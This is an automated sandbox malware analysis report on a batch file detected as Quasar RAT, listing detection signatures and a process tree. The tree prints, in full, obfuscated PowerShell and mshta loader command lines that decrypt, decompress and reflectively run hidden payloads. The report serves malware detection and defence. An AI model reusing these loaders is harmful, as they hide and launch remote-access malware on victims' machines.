Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WinScanGuard_v.2.1.bat

Overview

General Information

Sample Name:WinScanGuard_v.2.1.bat
Analysis ID:1352643
MD5:1837a5f032a42228c0854fb83a8d12c8
SHA1:de434e8479dfbc102ac30428b69199009973d788
SHA256:13291c07421049ba4d39f521c3ae17923180ac5186d87952709c1fa775e39dd4
Tags:bat
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • cmd.exe (PID: 6772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WinScanGuard_v.2.1.bat.exe (PID: 7128 cmdline: "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 4916 cmdline: C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • WerFault.exe (PID: 1440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • dllhost.exe (PID: 1228 cmdline: C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • $sxr-mshta.exe (PID: 344 cmdline: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • $sxr-cmd.exe (PID: 5820 cmdline: "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • $sxr-powershell.exe (PID: 5088 cmdline: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = [Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 1908 cmdline: C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • dllhost.exe (PID: 1196 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • $sxr-powershell.exe (PID: 7056 cmdline: "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = [Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 5800 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • dllhost.exe (PID: 2740 cmdline: C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 6720 cmdline: C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
